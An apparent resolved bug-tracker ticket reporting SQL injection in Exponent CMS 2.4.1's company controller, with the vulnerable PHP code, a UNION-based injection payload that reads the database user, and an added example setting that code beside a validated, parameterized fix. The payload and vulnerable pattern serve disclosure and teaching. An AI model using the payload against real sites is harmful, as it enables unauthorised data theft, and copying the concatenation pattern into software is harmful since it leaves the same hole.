#1407 ✓resolved

SQL Injection Vulnerability in Exponent CMS 2.4.1

Reported by Croxy | February 26th, 2017 @ 03:56 PM | in 2.4.2 (closed)

    &id=1' UNION ALL SELECT 1,user(),1,1,1,1,1,1,1,1%23

In framework/modules/companyController.php

    function show()
    {
//        global $db, $user, $router;
        global $user, $router;
        expHistory::set('viewable', $this->params);

        $count_sql_start = 'SELECT COUNT(DISTINCT p.id) as c FROM '.DB_TABLE_PREFIX.'_product p ';

        $sql_start  = 'SELECT DISTINCT p.* FROM '.DB_TABLE_PREFIX.'_product p ';
        //$sql = 'JOIN '.DB_TABLE_PREFIX.'_product_storeCategories sc ON p.id = sc.product_id ';
        $sql = 'WHERE ';
        if (!$user->isAdmin()) $sql .= '(p.active_type=0 OR p.active_type=1) AND ' ;
        //$sql .= 'sc.storecategories_id IN (';
        //$sql .= 'SELECT id FROM '.DB_TABLE_PREFIX.'_storeCategories WHERE rgt BETWEEN '.$this->category->lft.' AND '.$this->category->rgt.')';
        // request parameter concatenated into the WHERE clause without validation or quoting
        $sql .=  'p.companies_id=' . $this->params['id'];
        $sql .=  ' AND p.parent_id = 0';

        $count_sql = $count_sql_start . $sql;
        $sql = $sql_start . $sql;
        $order = 'id'; //$this->config['orderby'];
        $dir = 'DESC'; //$this->config['orderby_dir'];

I can control $this->params['id'], and I can use this parameter for SQL injection.

Line 118:

            'record'=>new company($this->params['id']),
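The concatenation pattern quoted above, placed beside a hardened version, as an added example that is not Exponent CMS code and does not use its `$db` abstraction. It assumes PHP with PDO and the SQLite driver, an in-memory table `exp_product` standing in for the real product table (constructed data), and hypothetical function names `vulnerableShow` and `hardenedShow`. The hardened variant validates that the id is an unsigned integer before it reaches SQL and binds it as a typed parameter, which is the check `show()` is missing.

```php
<?php
// Added example, not Exponent CMS code: contrasts the string-built WHERE clause
// from companyController::show() with an input-validated, parameterized query.
// PDO + SQLite in memory stand in for the project's $db layer (constructed data).

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE exp_product (id INTEGER, title TEXT, active_type INTEGER, companies_id INTEGER, parent_id INTEGER)');
$pdo->exec("INSERT INTO exp_product VALUES (1, 'Widget', 0, 1, 0), (2, 'Gadget', 0, 2, 0)");

// Same shape as the ticket: the request value is spliced into the SQL text,
// so whatever the caller sends becomes part of the query's structure.
function vulnerableShow(PDO $pdo, string $id): array
{
    $sql  = 'SELECT DISTINCT p.* FROM exp_product p WHERE ';
    $sql .= '(p.active_type=0 OR p.active_type=1) AND ';
    $sql .= 'p.companies_id=' . $id;        // untrusted, unquoted, unvalidated
    $sql .= ' AND p.parent_id = 0';
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: reject anything that is not a plain unsigned integer, then bind the
// value as a parameter so it can never alter the statement's structure.
function hardenedShow(PDO $pdo, string $id): array
{
    if ($id === '' || !ctype_digit($id)) {
        throw new InvalidArgumentException('company id must be an unsigned integer');
    }
    $stmt = $pdo->prepare(
        'SELECT DISTINCT p.* FROM exp_product p WHERE (p.active_type=0 OR p.active_type=1) '
        . 'AND p.companies_id = :cid AND p.parent_id = 0'
    );
    $stmt->bindValue(':cid', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A benign id behaves the same in both versions.
printf("vulnerable, id='2'        : %d row(s)\n", count(vulnerableShow($pdo, '2')));
printf("hardened,   id='2'        : %d row(s)\n", count(hardenedShow($pdo, '2')));

// A non-numeric id changes the vulnerable query's logic (tautology widens the
// result set); the hardened version refuses it before any SQL is built.
printf("vulnerable, id='2 OR 1=1' : %d row(s)\n", count(vulnerableShow($pdo, '2 OR 1=1')));
try {
    hardenedShow($pdo, '2 OR 1=1');
} catch (InvalidArgumentException $e) {
    echo "hardened,   id='2 OR 1=1' : rejected ({$e->getMessage()})\n";
}
```

Run with `php example.php`. The validation step matters independently of the prepared statement: `companies_id` is an integer column, so any id that is not a string of digits is already a malformed request and should be rejected (and is worth logging) rather than passed through, even to a bound parameter.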
